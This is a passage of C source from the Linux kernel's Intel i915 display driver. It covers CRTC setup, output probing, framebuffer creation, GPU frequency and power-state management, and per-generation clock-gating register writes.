if ((val & DISPLAY_PLANE_ENABLE) == 0)
return;
if (!!(val & DISPPLANE_SEL_PIPE_MASK) == pipe)
return;
/* This display plane is active and attached to the other CPU pipe. */
pipe = !pipe;
/* Disable the plane and wait for it to stop reading from the pipe. */
intel_disable_plane(dev_priv, plane, pipe);
intel_disable_pipe(dev_priv, pipe);
}
static void intel_crtc_reset(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
/* Reset flags back to the 'unknown' status so that they
* will be correctly set on the initial modeset.
*/
intel_crtc->dpms_mode = -1;
/* We need to fix up any BIOS configuration that conflicts with
* our expectations.
*/
intel_sanitize_modesetting(dev, intel_crtc->pipe, intel_crtc->plane);
}
static struct drm_crtc_helper_funcs intel_helper_funcs = {
.dpms = intel_crtc_dpms,
.mode_fixup = intel_crtc_mode_fixup,
.mode_set = intel_crtc_mode_set,
.mode_set_base = intel_pipe_set_base,
.mode_set_base_atomic = intel_pipe_set_base_atomic,
.load_lut = intel_crtc_load_lut,
.disable = intel_crtc_disable,
};
static const struct drm_crtc_funcs intel_crtc_funcs = {
.reset = intel_crtc_reset,
.cursor_set = intel_crtc_cursor_set,
.cursor_move = intel_crtc_cursor_move,
.gamma_set = intel_crtc_gamma_set,
.set_config = drm_crtc_helper_set_config,
.destroy = intel_crtc_destroy,
.page_flip = intel_crtc_page_flip,
};
static void intel_crtc_init(struct drm_device *dev, int pipe)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc;
int i;
intel_crtc = kzalloc(sizeof(struct intel_crtc) + (INTELFB_CONN_LIMIT * sizeof(struct drm_connector *)), GFP_KERNEL);
if (intel_crtc == NULL)
return;
drm_crtc_init(dev, &intel_crtc->base, &intel_crtc_funcs);
drm_mode_crtc_set_gamma_size(&intel_crtc->base, 256);
for (i = 0; i < 256; i++) {
intel_crtc->lut_r[i] = i;
intel_crtc->lut_g[i] = i;
intel_crtc->lut_b[i] = i;
}
/* Swap pipes & planes for FBC on pre-965 */
intel_crtc->pipe = pipe;
intel_crtc->plane = pipe;
if (IS_MOBILE(dev) && IS_GEN3(dev)) {
DRM_DEBUG_KMS("swapping pipes & planes for FBC\n");
intel_crtc->plane = !pipe;
}
BUG_ON(pipe >= ARRAY_SIZE(dev_priv->plane_to_crtc_mapping) ||
dev_priv->plane_to_crtc_mapping[intel_crtc->plane] != NULL);
dev_priv->plane_to_crtc_mapping[intel_crtc->plane] = &intel_crtc->base;
dev_priv->pipe_to_crtc_mapping[intel_crtc->pipe] = &intel_crtc->base;
intel_crtc_reset(&intel_crtc->base);
intel_crtc->active = true; /* force the pipe off on setup_init_config */
intel_crtc->bpp = 24; /* default for pre-Ironlake */
if (HAS_PCH_SPLIT(dev)) {
intel_helper_funcs.prepare = ironlake_crtc_prepare;
intel_helper_funcs.commit = ironlake_crtc_commit;
} else {
intel_helper_funcs.prepare = i9xx_crtc_prepare;
intel_helper_funcs.commit = i9xx_crtc_commit;
}
drm_crtc_helper_add(&intel_crtc->base, &intel_helper_funcs);
intel_crtc->busy = false;
setup_timer(&intel_crtc->idle_timer, intel_crtc_idle_timer,
(unsigned long)intel_crtc);
}
int intel_get_pipe_from_crtc_id(struct drm_device *dev, void *data,
struct drm_file *file)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct drm_i915_get_pipe_from_crtc_id *pipe_from_crtc_id = data;
struct drm_mode_object *drmmode_obj;
struct intel_crtc *crtc;
if (!dev_priv) {
DRM_ERROR("called with no initialization\n");
return -EINVAL;
}
drmmode_obj = drm_mode_object_find(dev, pipe_from_crtc_id->crtc_id,
DRM_MODE_OBJECT_CRTC);
if (!drmmode_obj) {
DRM_ERROR("no such CRTC id\n");
return -EINVAL;
}
crtc = to_intel_crtc(obj_to_crtc(drmmode_obj));
pipe_from_crtc_id->pipe = crtc->pipe;
return 0;
}
static int intel_encoder_clones(struct drm_device *dev, int type_mask)
{
struct intel_encoder *encoder;
int index_mask = 0;
int entry = 0;
list_for_each_entry(encoder, &dev->mode_config.encoder_list, base.head) {
if (type_mask & encoder->clone_mask)
index_mask |= (1 << entry);
entry++;
}
return index_mask;
}
static bool has_edp_a(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (!IS_MOBILE(dev))
return false;
if ((I915_READ(DP_A) & DP_DETECTED) == 0)
return false;
if (IS_GEN5(dev) &&
(I915_READ(ILK_DISPLAY_CHICKEN_FUSES) & ILK_eDP_A_DISABLE))
return false;
return true;
}
static void intel_setup_outputs(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_encoder *encoder;
bool dpd_is_edp = false;
bool has_lvds = false;
if (IS_MOBILE(dev) && !IS_I830(dev))
has_lvds = intel_lvds_init(dev);
if (!has_lvds && !HAS_PCH_SPLIT(dev)) {
/* disable the panel fitter on everything but LVDS */
I915_WRITE(PFIT_CONTROL, 0);
}
if (HAS_PCH_SPLIT(dev)) {
dpd_is_edp = intel_dpd_is_edp(dev);
if (has_edp_a(dev))
intel_dp_init(dev, DP_A);
if (dpd_is_edp && (I915_READ(PCH_DP_D) & DP_DETECTED))
intel_dp_init(dev, PCH_DP_D);
}
intel_crt_init(dev);
if (HAS_PCH_SPLIT(dev)) {
int found;
if (I915_READ(HDMIB) & PORT_DETECTED) {
/* PCH SDVOB multiplex with HDMIB */
found = intel_sdvo_init(dev, PCH_SDVOB);
if (!found)
intel_hdmi_init(dev, HDMIB);
if (!found && (I915_READ(PCH_DP_B) & DP_DETECTED))
intel_dp_init(dev, PCH_DP_B);
}
if (I915_READ(HDMIC) & PORT_DETECTED)
intel_hdmi_init(dev, HDMIC);
if (I915_READ(HDMID) & PORT_DETECTED)
intel_hdmi_init(dev, HDMID);
if (I915_READ(PCH_DP_C) & DP_DETECTED)
intel_dp_init(dev, PCH_DP_C);
if (!dpd_is_edp && (I915_READ(PCH_DP_D) & DP_DETECTED))
intel_dp_init(dev, PCH_DP_D);
} else if (SUPPORTS_DIGITAL_OUTPUTS(dev)) {
bool found = false;
if (I915_READ(SDVOB) & SDVO_DETECTED) {
DRM_DEBUG_KMS("probing SDVOB\n");
found = intel_sdvo_init(dev, SDVOB);
if (!found && SUPPORTS_INTEGRATED_HDMI(dev)) {
DRM_DEBUG_KMS("probing HDMI on SDVOB\n");
intel_hdmi_init(dev, SDVOB);
}
if (!found && SUPPORTS_INTEGRATED_DP(dev)) {
DRM_DEBUG_KMS("probing DP_B\n");
intel_dp_init(dev, DP_B);
}
}
/* Before G4X SDVOC doesn't have its own detect register */
if (I915_READ(SDVOB) & SDVO_DETECTED) {
DRM_DEBUG_KMS("probing SDVOC\n");
found = intel_sdvo_init(dev, SDVOC);
}
if (!found && (I915_READ(SDVOC) & SDVO_DETECTED)) {
if (SUPPORTS_INTEGRATED_HDMI(dev)) {
DRM_DEBUG_KMS("probing HDMI on SDVOC\n");
intel_hdmi_init(dev, SDVOC);
}
if (SUPPORTS_INTEGRATED_DP(dev)) {
DRM_DEBUG_KMS("probing DP_C\n");
intel_dp_init(dev, DP_C);
}
}
if (SUPPORTS_INTEGRATED_DP(dev) &&
(I915_READ(DP_D) & DP_DETECTED)) {
DRM_DEBUG_KMS("probing DP_D\n");
intel_dp_init(dev, DP_D);
}
} else if (IS_GEN2(dev))
intel_dvo_init(dev);
if (SUPPORTS_TV(dev))
intel_tv_init(dev);
list_for_each_entry(encoder, &dev->mode_config.encoder_list, base.head) {
encoder->base.possible_crtcs = encoder->crtc_mask;
encoder->base.possible_clones =
intel_encoder_clones(dev, encoder->clone_mask);
}
/* disable all the possible outputs/crtcs before entering KMS mode */
drm_helper_disable_unused_functions(dev);
}
static void intel_user_framebuffer_destroy(struct drm_framebuffer *fb)
{
struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
drm_framebuffer_cleanup(fb);
drm_gem_object_unreference_unlocked(&intel_fb->obj->base);
kfree(intel_fb);
}
static int intel_user_framebuffer_create_handle(struct drm_framebuffer *fb,
struct drm_file *file,
unsigned int *handle)
{
struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
struct drm_i915_gem_object *obj = intel_fb->obj;
return drm_gem_handle_create(file, &obj->base, handle);
}
static const struct drm_framebuffer_funcs intel_fb_funcs = {
.destroy = intel_user_framebuffer_destroy,
.create_handle = intel_user_framebuffer_create_handle,
};
int intel_framebuffer_init(struct drm_device *dev,
struct intel_framebuffer *intel_fb,
struct drm_mode_fb_cmd *mode_cmd,
struct drm_i915_gem_object *obj)
{
int ret;
if (obj->tiling_mode == I915_TILING_Y)
return -EINVAL;
if (mode_cmd->pitch & 63)
return -EINVAL;
switch (mode_cmd->bpp) {
case 8:
case 16:
/* Only pre-ILK can handle 5:5:5 */
if (mode_cmd->depth == 15 && !HAS_PCH_SPLIT(dev))
return -EINVAL;
break;
case 24:
case 32:
break;
default:
return -EINVAL;
}
ret = drm_framebuffer_init(dev, &intel_fb->base, &intel_fb_funcs);
if (ret) {
DRM_ERROR("framebuffer init failed %d\n", ret);
return ret;
}
drm_helper_mode_fill_fb_struct(&intel_fb->base, mode_cmd);
intel_fb->obj = obj;
return 0;
}
static struct drm_framebuffer *
intel_user_framebuffer_create(struct drm_device *dev,
struct drm_file *filp,
struct drm_mode_fb_cmd *mode_cmd)
{
struct drm_i915_gem_object *obj;
obj = to_intel_bo(drm_gem_object_lookup(dev, filp, mode_cmd->handle));
if (&obj->base == NULL)
return ERR_PTR(-ENOENT);
return intel_framebuffer_create(dev, mode_cmd, obj);
}
static const struct drm_mode_config_funcs intel_mode_funcs = {
.fb_create = intel_user_framebuffer_create,
.output_poll_changed = intel_fb_output_poll_changed,
};
static struct drm_i915_gem_object *
intel_alloc_context_page(struct drm_device *dev)
{
struct drm_i915_gem_object *ctx;
int ret;
WARN_ON(!mutex_is_locked(&dev->struct_mutex));
ctx = i915_gem_alloc_object(dev, 4096);
if (!ctx) {
DRM_DEBUG("failed to alloc power context, RC6 disabled\n");
return NULL;
}
ret = i915_gem_object_pin(ctx, 4096, true);
if (ret) {
DRM_ERROR("failed to pin power context: %d\n", ret);
goto err_unref;
}
ret = i915_gem_object_set_to_gtt_domain(ctx, 1);
if (ret) {
DRM_ERROR("failed to set-domain on power context: %d\n", ret);
goto err_unpin;
}
return ctx;
err_unpin:
i915_gem_object_unpin(ctx);
err_unref:
drm_gem_object_unreference(&ctx->base);
mutex_unlock(&dev->struct_mutex);
return NULL;
}
bool ironlake_set_drps(struct drm_device *dev, u8 val)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u16 rgvswctl;
rgvswctl = I915_READ16(MEMSWCTL);
if (rgvswctl & MEMCTL_CMD_STS) {
DRM_DEBUG("gpu busy, RCS change rejected\n");
return false; /* still busy with another command */
}
rgvswctl = (MEMCTL_CMD_CHFREQ << MEMCTL_CMD_SHIFT) |
(val << MEMCTL_FREQ_SHIFT) | MEMCTL_SFCAVM;
I915_WRITE16(MEMSWCTL, rgvswctl);
POSTING_READ16(MEMSWCTL);
rgvswctl |= MEMCTL_CMD_STS;
I915_WRITE16(MEMSWCTL, rgvswctl);
return true;
}
void ironlake_enable_drps(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 rgvmodectl = I915_READ(MEMMODECTL);
u8 fmax, fmin, fstart, vstart;
/* Enable temp reporting */
I915_WRITE16(PMMISC, I915_READ(PMMISC) | MCPPCE_EN);
I915_WRITE16(TSC1, I915_READ(TSC1) | TSE);
/* 100ms RC evaluation intervals */
I915_WRITE(RCUPEI, 100000);
I915_WRITE(RCDNEI, 100000);
/* Set max/min thresholds to 90ms and 80ms respectively */
I915_WRITE(RCBMAXAVG, 90000);
I915_WRITE(RCBMINAVG, 80000);
I915_WRITE(MEMIHYST, 1);
/* Set up min, max, and cur for interrupt handling */
fmax = (rgvmodectl & MEMMODE_FMAX_MASK) >> MEMMODE_FMAX_SHIFT;
fmin = (rgvmodectl & MEMMODE_FMIN_MASK);
fstart = (rgvmodectl & MEMMODE_FSTART_MASK) >>
MEMMODE_FSTART_SHIFT;
vstart = (I915_READ(PXVFREQ_BASE + (fstart * 4)) & PXVFREQ_PX_MASK) >>
PXVFREQ_PX_SHIFT;
dev_priv->fmax = fmax; /* IPS callback will increase this */
dev_priv->fstart = fstart;
dev_priv->max_delay = fstart;
dev_priv->min_delay = fmin;
dev_priv->cur_delay = fstart;
DRM_DEBUG_DRIVER("fmax: %d, fmin: %d, fstart: %d\n",
fmax, fmin, fstart);
I915_WRITE(MEMINTREN, MEMINT_CX_SUPR_EN | MEMINT_EVAL_CHG_EN);
/*
* Interrupts will be enabled in ironlake_irq_postinstall
*/
I915_WRITE(VIDSTART, vstart);
POSTING_READ(VIDSTART);
rgvmodectl |= MEMMODE_SWMODE_EN;
I915_WRITE(MEMMODECTL, rgvmodectl);
if (wait_for((I915_READ(MEMSWCTL) & MEMCTL_CMD_STS) == 0, 10))
DRM_ERROR("stuck trying to change perf mode\n");
msleep(1);
ironlake_set_drps(dev, fstart);
dev_priv->last_count1 = I915_READ(0x112e4) + I915_READ(0x112e8) +
I915_READ(0x112e0);
dev_priv->last_time1 = jiffies_to_msecs(jiffies);
dev_priv->last_count2 = I915_READ(0x112f4);
getrawmonotonic(&dev_priv->last_time2);
}
void ironlake_disable_drps(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u16 rgvswctl = I915_READ16(MEMSWCTL);
/* Ack interrupts, disable EFC interrupt */
I915_WRITE(MEMINTREN, I915_READ(MEMINTREN) & ~MEMINT_EVAL_CHG_EN);
I915_WRITE(MEMINTRSTS, MEMINT_EVAL_CHG);
I915_WRITE(DEIER, I915_READ(DEIER) & ~DE_PCU_EVENT);
I915_WRITE(DEIIR, DE_PCU_EVENT);
I915_WRITE(DEIMR, I915_READ(DEIMR) | DE_PCU_EVENT);
/* Go back to the starting frequency */
ironlake_set_drps(dev, dev_priv->fstart);
msleep(1);
rgvswctl |= MEMCTL_CMD_STS;
I915_WRITE(MEMSWCTL, rgvswctl);
msleep(1);
}
void gen6_set_rps(struct drm_device *dev, u8 val)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 swreq;
swreq = (val & 0x3ff) << 25;
I915_WRITE(GEN6_RPNSWREQ, swreq);
}
void gen6_disable_rps(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
I915_WRITE(GEN6_RPNSWREQ, 1 << 31);
I915_WRITE(GEN6_PMINTRMSK, 0xffffffff);
I915_WRITE(GEN6_PMIER, 0);
spin_lock_irq(&dev_priv->rps_lock);
dev_priv->pm_iir = 0;
spin_unlock_irq(&dev_priv->rps_lock);
I915_WRITE(GEN6_PMIIR, I915_READ(GEN6_PMIIR));
}
static unsigned long intel_pxfreq(u32 vidfreq)
{
unsigned long freq;
int div = (vidfreq & 0x3f0000) >> 16;
int post = (vidfreq & 0x3000) >> 12;
int pre = (vidfreq & 0x7);
if (!pre)
return 0;
freq = ((div * 133333) / ((1<<post) * pre));
return freq;
}
void intel_init_emon(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 lcfuse;
u8 pxw[16];
int i;
/* Disable to program */
I915_WRITE(ECR, 0);
POSTING_READ(ECR);
/* Program energy weights for various events */
I915_WRITE(SDEW, 0x15040d00);
I915_WRITE(CSIEW0, 0x007f0000);
I915_WRITE(CSIEW1, 0x1e220004);
I915_WRITE(CSIEW2, 0x04000004);
for (i = 0; i < 5; i++)
I915_WRITE(PEW + (i * 4), 0);
for (i = 0; i < 3; i++)
I915_WRITE(DEW + (i * 4), 0);
/* Program P-state weights to account for frequency power adjustment */
for (i = 0; i < 16; i++) {
u32 pxvidfreq = I915_READ(PXVFREQ_BASE + (i * 4));
unsigned long freq = intel_pxfreq(pxvidfreq);
unsigned long vid = (pxvidfreq & PXVFREQ_PX_MASK) >>
PXVFREQ_PX_SHIFT;
unsigned long val;
val = vid * vid;
val *= (freq / 1000);
val *= 255;
val /= (127*127*900);
if (val > 0xff)
DRM_ERROR("bad pxval: %ld\n", val);
pxw[i] = val;
}
/* Render standby states get 0 weight */
pxw[14] = 0;
pxw[15] = 0;
for (i = 0; i < 4; i++) {
u32 val = (pxw[i*4] << 24) | (pxw[(i*4)+1] << 16) |
(pxw[(i*4)+2] << 8) | (pxw[(i*4)+3]);
I915_WRITE(PXW + (i * 4), val);
}
/* Adjust magic regs to magic values (more experimental results) */
I915_WRITE(OGW0, 0);
I915_WRITE(OGW1, 0);
I915_WRITE(EG0, 0x00007f00);
I915_WRITE(EG1, 0x0000000e);
I915_WRITE(EG2, 0x000e0000);
I915_WRITE(EG3, 0x68000300);
I915_WRITE(EG4, 0x42000000);
I915_WRITE(EG5, 0x00140031);
I915_WRITE(EG6, 0);
I915_WRITE(EG7, 0);
for (i = 0; i < 8; i++)
I915_WRITE(PXWL + (i * 4), 0);
/* Enable PMON + select events */
I915_WRITE(ECR, 0x80000019);
lcfuse = I915_READ(LCFUSE02);
dev_priv->corr = (lcfuse & LCFUSE_HIV_MASK);
}
void gen6_enable_rps(struct drm_i915_private *dev_priv)
{
u32 rp_state_cap = I915_READ(GEN6_RP_STATE_CAP);
u32 gt_perf_status = I915_READ(GEN6_GT_PERF_STATUS);
u32 pcu_mbox, rc6_mask = 0;
int cur_freq, min_freq, max_freq;
int i;
/* Here begins a magic sequence of register writes to enable
* auto-downclocking.
*
* Perhaps there might be some value in exposing these to
* userspace...
*/
I915_WRITE(GEN6_RC_STATE, 0);
mutex_lock(&dev_priv->dev->struct_mutex);
gen6_gt_force_wake_get(dev_priv);
/* disable the counters and set deterministic thresholds */
I915_WRITE(GEN6_RC_CONTROL, 0);
I915_WRITE(GEN6_RC1_WAKE_RATE_LIMIT, 1000 << 16);
I915_WRITE(GEN6_RC6_WAKE_RATE_LIMIT, 40 << 16 | 30);
I915_WRITE(GEN6_RC6pp_WAKE_RATE_LIMIT, 30);
I915_WRITE(GEN6_RC_EVALUATION_INTERVAL, 125000);
I915_WRITE(GEN6_RC_IDLE_HYSTERSIS, 25);
for (i = 0; i < I915_NUM_RINGS; i++)
I915_WRITE(RING_MAX_IDLE(dev_priv->ring[i].mmio_base), 10);
I915_WRITE(GEN6_RC_SLEEP, 0);
I915_WRITE(GEN6_RC1e_THRESHOLD, 1000);
I915_WRITE(GEN6_RC6_THRESHOLD, 50000);
I915_WRITE(GEN6_RC6p_THRESHOLD, 100000);
I915_WRITE(GEN6_RC6pp_THRESHOLD, 64000); /* unused */
if (i915_enable_rc6)
rc6_mask = GEN6_RC_CTL_RC6p_ENABLE |
GEN6_RC_CTL_RC6_ENABLE;
I915_WRITE(GEN6_RC_CONTROL,
rc6_mask |
GEN6_RC_CTL_EI_MODE(1) |
GEN6_RC_CTL_HW_ENABLE);
I915_WRITE(GEN6_RPNSWREQ,
GEN6_FREQUENCY(10) |
GEN6_OFFSET(0) |
GEN6_AGGRESSIVE_TURBO);
I915_WRITE(GEN6_RC_VIDEO_FREQ,
GEN6_FREQUENCY(12));
I915_WRITE(GEN6_RP_DOWN_TIMEOUT, 1000000);
I915_WRITE(GEN6_RP_INTERRUPT_LIMITS,
18 << 24 |
6 << 16);
I915_WRITE(GEN6_RP_UP_THRESHOLD, 10000);
I915_WRITE(GEN6_RP_DOWN_THRESHOLD, 1000000);
I915_WRITE(GEN6_RP_UP_EI, 100000);
I915_WRITE(GEN6_RP_DOWN_EI, 5000000);
I915_WRITE(GEN6_RP_IDLE_HYSTERSIS, 10);
I915_WRITE(GEN6_RP_CONTROL,
GEN6_RP_MEDIA_TURBO |
GEN6_RP_USE_NORMAL_FREQ |
GEN6_RP_MEDIA_IS_GFX |
GEN6_RP_ENABLE |
GEN6_RP_UP_BUSY_AVG |
GEN6_RP_DOWN_IDLE_CONT);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to become idle\n");
I915_WRITE(GEN6_PCODE_DATA, 0);
I915_WRITE(GEN6_PCODE_MAILBOX,
GEN6_PCODE_READY |
GEN6_PCODE_WRITE_MIN_FREQ_TABLE);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to finish\n");
min_freq = (rp_state_cap & 0xff0000) >> 16;
max_freq = rp_state_cap & 0xff;
cur_freq = (gt_perf_status & 0xff00) >> 8;
/* Check for overclock support */
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to become idle\n");
I915_WRITE(GEN6_PCODE_MAILBOX, GEN6_READ_OC_PARAMS);
pcu_mbox = I915_READ(GEN6_PCODE_DATA);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) & GEN6_PCODE_READY) == 0,
500))
DRM_ERROR("timeout waiting for pcode mailbox to finish\n");
if (pcu_mbox & (1<<31)) { /* OC supported */
max_freq = pcu_mbox & 0xff;
DRM_DEBUG_DRIVER("overclocking supported, adjusting frequency max to %dMHz\n", pcu_mbox * 50);
}
/* In units of 100MHz */
dev_priv->max_delay = max_freq;
dev_priv->min_delay = min_freq;
dev_priv->cur_delay = cur_freq;
/* requires MSI enabled */
I915_WRITE(GEN6_PMIER,
GEN6_PM_MBOX_EVENT |
GEN6_PM_THERMAL_EVENT |
GEN6_PM_RP_DOWN_TIMEOUT |
GEN6_PM_RP_UP_THRESHOLD |
GEN6_PM_RP_DOWN_THRESHOLD |
GEN6_PM_RP_UP_EI_EXPIRED |
GEN6_PM_RP_DOWN_EI_EXPIRED);
spin_lock_irq(&dev_priv->rps_lock);
WARN_ON(dev_priv->pm_iir != 0);
I915_WRITE(GEN6_PMIMR, 0);
spin_unlock_irq(&dev_priv->rps_lock);
/* enable all PM interrupts */
I915_WRITE(GEN6_PMINTRMSK, 0);
gen6_gt_force_wake_put(dev_priv);
mutex_unlock(&dev_priv->dev->struct_mutex);
}
void gen6_update_ring_freq(struct drm_i915_private *dev_priv)
{
int min_freq = 15;
int gpu_freq, ia_freq, max_ia_freq;
int scaling_factor = 180;
max_ia_freq = cpufreq_quick_get_max(0);
/*
* Default to measured freq if none found, PCU will ensure we don't go
* over
*/
if (!max_ia_freq)
max_ia_freq = tsc_khz;
/* Convert from kHz to MHz */
max_ia_freq /= 1000;
mutex_lock(&dev_priv->dev->struct_mutex);
/*
* For each potential GPU frequency, load a ring frequency we'd like
* to use for memory access. We do this by specifying the IA frequency
* the PCU should use as a reference to determine the ring frequency.
*/
for (gpu_freq = dev_priv->max_delay; gpu_freq >= dev_priv->min_delay;
gpu_freq--) {
int diff = dev_priv->max_delay - gpu_freq;
/*
* For GPU frequencies less than 750MHz, just use the lowest
* ring freq.
*/
if (gpu_freq < min_freq)
ia_freq = 800;
else
ia_freq = max_ia_freq - ((diff * scaling_factor) / 2);
ia_freq = DIV_ROUND_CLOSEST(ia_freq, 100);
I915_WRITE(GEN6_PCODE_DATA,
(ia_freq << GEN6_PCODE_FREQ_IA_RATIO_SHIFT) |
gpu_freq);
I915_WRITE(GEN6_PCODE_MAILBOX, GEN6_PCODE_READY |
GEN6_PCODE_WRITE_MIN_FREQ_TABLE);
if (wait_for((I915_READ(GEN6_PCODE_MAILBOX) &
GEN6_PCODE_READY) == 0, 10)) {
DRM_ERROR("pcode write of freq table timed out\n");
continue;
}
}
mutex_unlock(&dev_priv->dev->struct_mutex);
}
static void ironlake_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
uint32_t dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE;
/* Required for FBC */
dspclk_gate |= DPFCUNIT_CLOCK_GATE_DISABLE |
DPFCRUNIT_CLOCK_GATE_DISABLE |
DPFDUNIT_CLOCK_GATE_DISABLE;
/* Required for CxSR */
dspclk_gate |= DPARBUNIT_CLOCK_GATE_DISABLE;
I915_WRITE(PCH_3DCGDIS0,
MARIUNIT_CLOCK_GATE_DISABLE |
SVSMUNIT_CLOCK_GATE_DISABLE);
I915_WRITE(PCH_3DCGDIS1,
VFMUNIT_CLOCK_GATE_DISABLE);
I915_WRITE(PCH_DSPCLK_GATE_D, dspclk_gate);
/*
* According to the spec the following bits should be set in
* order to enable memory self-refresh
* The bit 22/21 of 0x42004
* The bit 5 of 0x42020
* The bit 15 of 0x45000
*/
I915_WRITE(ILK_DISPLAY_CHICKEN2,
(I915_READ(ILK_DISPLAY_CHICKEN2) |
ILK_DPARB_GATE | ILK_VSDPFD_FULL));
I915_WRITE(ILK_DSPCLK_GATE,
(I915_READ(ILK_DSPCLK_GATE) |
ILK_DPARB_CLK_GATE));
I915_WRITE(DISP_ARB_CTL,
(I915_READ(DISP_ARB_CTL) |
DISP_FBC_WM_DIS));
I915_WRITE(WM3_LP_ILK, 0);
I915_WRITE(WM2_LP_ILK, 0);
I915_WRITE(WM1_LP_ILK, 0);
/*
* Based on the document from hardware guys the following bits
* should be set unconditionally in order to enable FBC.
* The bit 22 of 0x42000
* The bit 22 of 0x42004
* The bit 7,8,9 of 0x42020.
*/
if (IS_IRONLAKE_M(dev)) {
I915_WRITE(ILK_DISPLAY_CHICKEN1,
I915_READ(ILK_DISPLAY_CHICKEN1) |
ILK_FBCQ_DIS);
I915_WRITE(ILK_DISPLAY_CHICKEN2,
I915_READ(ILK_DISPLAY_CHICKEN2) |
ILK_DPARB_GATE);
I915_WRITE(ILK_DSPCLK_GATE,
I915_READ(ILK_DSPCLK_GATE) |
ILK_DPFC_DIS1 |
ILK_DPFC_DIS2 |
ILK_CLK_FBC);
}
I915_WRITE(ILK_DISPLAY_CHICKEN2,
I915_READ(ILK_DISPLAY_CHICKEN2) |
ILK_ELPIN_409_SELECT);
I915_WRITE(_3D_CHICKEN2,
_3D_CHICKEN2_WM_READ_PIPELINED << 16 |
_3D_CHICKEN2_WM_READ_PIPELINED);
}
static void gen6_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int pipe;
uint32_t dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE;
I915_WRITE(PCH_DSPCLK_GATE_D, dspclk_gate);
I915_WRITE(ILK_DISPLAY_CHICKEN2,
I915_READ(ILK_DISPLAY_CHICKEN2) |
ILK_ELPIN_409_SELECT);
I915_WRITE(WM3_LP_ILK, 0);
I915_WRITE(WM2_LP_ILK, 0);
I915_WRITE(WM1_LP_ILK, 0);
/*
* According to the spec the following bits should be
* set in order to enable memory self-refresh and fbc:
* The bit21 and bit22 of 0x42000
* The bit21 and bit22 of 0x42004
* The bit5 and bit7 of 0x42020
* The bit14 of 0x70180
* The bit14 of 0x71180
*/
I915_WRITE(ILK_DISPLAY_CHICKEN1,
I915_READ(ILK_DISPLAY_CHICKEN1) |
ILK_FBCQ_DIS | ILK_PABSTRETCH_DIS);
I915_WRITE(ILK_DISPLAY_CHICKEN2,
I915_READ(ILK_DISPLAY_CHICKEN2) |
ILK_DPARB_GATE | ILK_VSDPFD_FULL);
I915_WRITE(ILK_DSPCLK_GATE,
I915_READ(ILK_DSPCLK_GATE) |
ILK_DPARB_CLK_GATE |
ILK_DPFD_CLK_GATE);
for_each_pipe(pipe) {
I915_WRITE(DSPCNTR(pipe),
I915_READ(DSPCNTR(pipe)) |
DISPPLANE_TRICKLE_FEED_DISABLE);
intel_flush_display_plane(dev_priv, pipe);
}
}
static void ivybridge_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int pipe;
uint32_t dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE;
I915_WRITE(PCH_DSPCLK_GATE_D, dspclk_gate);
I915_WRITE(WM3_LP_ILK, 0);
I915_WRITE(WM2_LP_ILK, 0);
I915_WRITE(WM1_LP_ILK, 0);
I915_WRITE(ILK_DSPCLK_GATE, IVB_VRHUNIT_CLK_GATE);
for_each_pipe(pipe) {
I915_WRITE(DSPCNTR(pipe),
I915_READ(DSPCNTR(pipe)) |
DISPPLANE_TRICKLE_FEED_DISABLE);
intel_flush_display_plane(dev_priv, pipe);
}
}
static void g4x_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
uint32_t dspclk_gate;
I915_WRITE(RENCLK_GATE_D1, 0);
I915_WRITE(RENCLK_GATE_D2, VF_UNIT_CLOCK_GATE_DISABLE |
GS_UNIT_CLOCK_GATE_DISABLE |
CL_UNIT_CLOCK_GATE_DISABLE);
I915_WRITE(RAMCLK_GATE_D, 0);
dspclk_gate = VRHUNIT_CLOCK_GATE_DISABLE |
OVRUNIT_CLOCK_GATE_DISABLE |
OVCUNIT_CLOCK_GATE_DISABLE;
if (IS_GM45(dev))
dspclk_gate |= DSSUNIT_CLOCK_GATE_DISABLE;
I915_WRITE(DSPCLK_GATE_D, dspclk_gate);
}
static void crestline_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
I915_WRITE(RENCLK_GATE_D1, I965_RCC_CLOCK_GATE_DISABLE);
I915_WRITE(RENCLK_GATE_D2, 0);
I915_WRITE(DSPCLK_GATE_D, 0);
I915_WRITE(RAMCLK_GATE_D, 0);
I915_WRITE16(DEUC, 0);
}
static void broadwater_init_clock_gating(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
I915_WRITE(RENCLK_GATE_D1, I965_RCZ_CLOCK_GATE_DISABLE |
I965_RCC_CLOCK_GATE_DISABLE |
I965_RCPB_CLOCK_GATE_DISABLE |
I965_ISC_CLOCK_GATE_DISABLE |
I965_FBC_CLOCK_GATE_DISABLE);
I915_WRITE(RENCLK_GATE_D2, 0);
}
